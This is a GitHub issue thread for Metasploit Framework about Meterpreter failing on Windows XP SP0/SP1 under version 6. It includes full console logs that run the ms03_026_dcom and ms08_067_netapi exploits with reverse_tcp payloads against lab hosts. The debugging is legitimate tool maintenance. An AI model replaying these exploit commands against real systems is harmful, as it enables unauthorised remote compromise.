### ISSUE TITLE
Meterpreter isn't stable against Windows XP < SP2 on MSF 6

### ISSUE THREAD

**Issue by erkanaksoy** [rapid7/metasploit-framework#14473]
## Steps to reproduce

How'd you do it?
1. use exploit/windows/dcerpc/ms03_026_dcom
2. set lhost, rhost accordingly and payload to windows/meterpreter/reverse_tcp
3. run the exploit

## Were you following a specific guide/tutorial or reading documentation?
No

## Expected behavior
Get a stable meterpreter, be able to run getuid, shell etc.

## Current behavior
Either meterpreter dies right away or getuid, shell etc says Unknown command
### Metasploit version
6.0.18-dev on Kali

**Comment by smcintyre-r7** [comment]
I was unable to reproduce this using MS08-067 targeting Windows XP SP2.

```
msf6 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 192.168.250.87:4444 
[*] 192.168.159.36:445 - Automatically detecting the target...
[*] 192.168.159.36:445 - Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] 192.168.159.36:445 - Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] 192.168.159.36:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.250.237
[*] Meterpreter session 1 opened (192.168.250.87:4444 -> 192.168.250.237:57064) at 2020-12-09 09:44:54 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : SMCINTYR-847E76
OS              : Windows XP (5.1 Build 2600, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(windows/smb/ms08_067_netapi) > version
Framework: 6.0.21-dev-36b94340f0
Console  : 6.0.21-dev-36b94340f0
msf6 exploit(windows/smb/ms08_067_netapi) >
```

My guess is this isn't actually a problem with meterpreter but rather the exploit itself.

**Comment by smcintyre-r7** [comment]
Alright, I was able to reproduce this issue with Windows XP SP0. I tried the ms03_026_dcom and ms08_067 exploits plus a straight EXE stager. None of them yield a functioning Meterpreter session leading me to now think this is an issue with Meterpreter running on Windows XP SP0 (and possibly SP1).

I also tested the straight EXE stager from MSF 5.0.101 where it also failed telling me that this is not an issue related to v6. After talking to the other team members it sounds like we may not be supporting Windows XP any more, but I'll need to confirm that.

<details>
<summary>Testing Output</summary>

```
/msfconsole
                                                  
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v6.0.21-dev-36b94340f0               ]
+ -- --=[ 2083 exploits - 1126 auxiliary - 355 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Use the resource command to run 
commands from a file

[*] Processing /home/smcintyre/.msf4/msfconsole.rc for ERB directives.
resource (/home/smcintyre/.msf4/msfconsole.rc)> setg SESSION -1
SESSION => -1
resource (/home/smcintyre/.msf4/msfconsole.rc)> load request
[*] Successfully loaded plugin: Request
resource (/home/smcintyre/.msf4/msfconsole.rc)> loadpath test/modules
Loaded 35 modules:
    13 auxiliary modules
    9 post modules
    13 exploit modules
msf6 > use exploit/windows/dcerpc/ms03_026_dcom 
show[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) > show options 

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   135              yes       The target port (TCP)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.250.87   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal


msf6 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.159.37
RHOSTS => 192.168.159.37
msf6 exploit(windows/dcerpc/ms03_026_dcom) > check
[-] Check failed: NoMethodError This module does not support check.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) > show options 

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.159.37   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   135              yes       The target port (TCP)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.250.87   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal


msf6 exploit(windows/dcerpc/ms03_026_dcom) > set LHOST 192.168.159.128 
LHOST => 192.168.159.128
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.37:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 192.168.159.37:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.159.37[135] ...
[*] 192.168.159.37:135 - Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.159.37[135] ...
[*] 192.168.159.37:135 - Sending exploit ...
[*] Sending stage (175174 bytes) to 192.168.159.37
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.37:1035) at 2020-12-09 10:48:37 -0500

meterpreter > 
[*] 192.168.159.37 - Meterpreter session 1 closed.  Reason: Died

msf6 exploit(windows/dcerpc/ms03_026_dcom) > 
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[-] 192.168.159.37:135 - Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.159.37:135).
[*] Exploit completed, but no session was created.
msf6 exploit(windows/dcerpc/ms03_026_dcom) > use exploit/windows/smb/ms08_067_netapi 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 192.168.159.37
RHOSTS => 192.168.159.37
msf6 exploit(windows/smb/ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.159.128 
LHOST => 192.168.159.128
msf6 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.37:445 - Automatically detecting the target...
[*] 192.168.159.37:445 - Fingerprint: Windows XP - Service Pack 0 / 1 - lang:English
[*] 192.168.159.37:445 - Selected Target: Windows XP SP0/SP1 Universal
[*] 192.168.159.37:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.159.37
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.37:1030) at 2020-12-09 10:50:07 -0500

meterpreter > getuid
[-] Unknown command: getuid.
meterpreter > getuid
[-] Unknown command: getuid.
meterpreter > sysinfo
[-] Unknown command: sysinfo.
meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   Migrate the server to another process
    pivot                     Manage pivot listeners
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session.
    transport                 Change the current transport mechanism
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.37 - Meterpreter session 2 closed.  Reason: User exit
msf6 exploit(windows/smb/ms08_067_netapi) > use payload/windows/meterpreter/reverse_tcp
msf6 payload(windows/meterpreter/reverse_tcp) > set LHOST 192.168.159.128 
LHOST => 192.168.159.128
msf6 payload(windows/meterpreter/reverse_tcp) > to_handler 
[*] Payload Handler Started as Job 0
msf6 payload(windows/meterpreter/reverse_tcp) > 
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Sending stage (175174 bytes) to 192.168.159.37
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.37:1037) at 2020-12-09 10:52:37 -0500
[*] 192.168.159.37 - Meterpreter session 3 closed.  Reason: Died
```
</details>

**Comment by erkanaksoy** [comment]
@smcintyre-r7 Thank you for taking the time to test this. 

I just have tested ms03_026_dcom against a Windows XP SP1 on MSF 5.0.71-dev and got a functioning meterpreter.

```
msf5 exploit(windows/dcerpc/ms03_026_dcom) > options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   135              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal


msf5 exploit(windows/dcerpc/ms03_026_dcom) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/dcerpc/ms03_026_dcom) > set lhost tun0
lhost => tap0
msf5 exploit(windows/dcerpc/ms03_026_dcom) > set rhosts x.x.x.x
rhosts => x.x.x.x
msf5 exploit(windows/dcerpc/ms03_026_dcom) > run

[*] Started reverse TCP handler on x.x.x.x:4444 
[*]x.x.x.x:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] x.x.x.x:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcpx.x.x.x[135] ...
[*] x.x.x.x:135 - Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:x.x.x.x[135] ...
[*] x.x.x.x:135 - Sending exploit ...
[*] Sending stage (180291 bytes) to x.x.x.x
[*] Meterpreter session 1 opened (x.x.x.x:4444 -> x.x.x.x:2020) at 2020-12-09 11:41:41 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
```

**Comment by smcintyre-r7** [comment]
Yeah you're right. I was able to reproduce this and then I went back through the output I posted and realized I made a mistake when testing v5.x. This does look like v6 broke compatibility with some older versions of XP.

**Comment by adfoster-r7** [comment]
@erkanaksoy Just out of interest; Was this a target that you saw in a real pen testing scenario, or was it something found in a lab?

**Comment by mr-shelton** [comment]
Faced almost with the same issue, but when ms17_010_psexec is used. Meterpreter says: 
Meterpreter session 1 closed.  Reason: Died.

**Comment by erkanaksoy** [comment]
@adfoster-r7 Sorry for late reply, ofcourse it was for a training. WinXP exploits work flawlessly, so awesome to have them on training :)

**Comment by smcintyre-r7** [comment]
I tracked this down a bit more and made progress on narrowing down where the breaking change was. It looks like Metasploit-Payloads v2.0.6 broke the compatibility. Versions 2.0.0 - 2.0.9 were dev builds for v6 with v2.0.10 being the one that shipped with MSF v6.0.

Version 2.0.6 removed the DLL exports, so I'll take a look into that next. Progress!

**Comment by smcintyre-r7** [comment]
I looked into this even more and found that the only PR landed for v2.0.6 was rapid7/metasploit-payloads#401. What's notable about this PR is that it removes the `backcompat` sub-project which provided stubs for [`EncodePointer`](https://docs.microsoft.com/en-us/previous-versions/bb432254(v=vs.85)) which was added in XP SP2. I quickly tested adding that back in and it seems to have addressed the issue, so I'm confident it's related.

I'll need to test everything a bit more and then it'll probably take me a day to put that back in.

**Comment by OJ** [comment]
That was a collective decision made a while ago when building the new
meterpreter for V6. We're basically at the point where carrying XP support
is a burden, especially for cmake/mingw support.

May I suggest having a bit of a chat with the team before putting that back
in?

**Comment by smcintyre-r7** [comment]
Alright yeah, I talked to the other team members and we're not going to backport support Meterpreter beyond it's current state which is XP SP2.

I tested a number of extensions on SP2 and ran our test modules and found that with the exception of the Python and Powershell extensions, everything worked as I would expect it to.  I opened a PR to note this in the module info. We may look at compatibility checks in the future.

For XP SP0 and SP1, users should install the last version of Metasploit 5 (5.0.101) or use an alternative payload like the reverse shell.
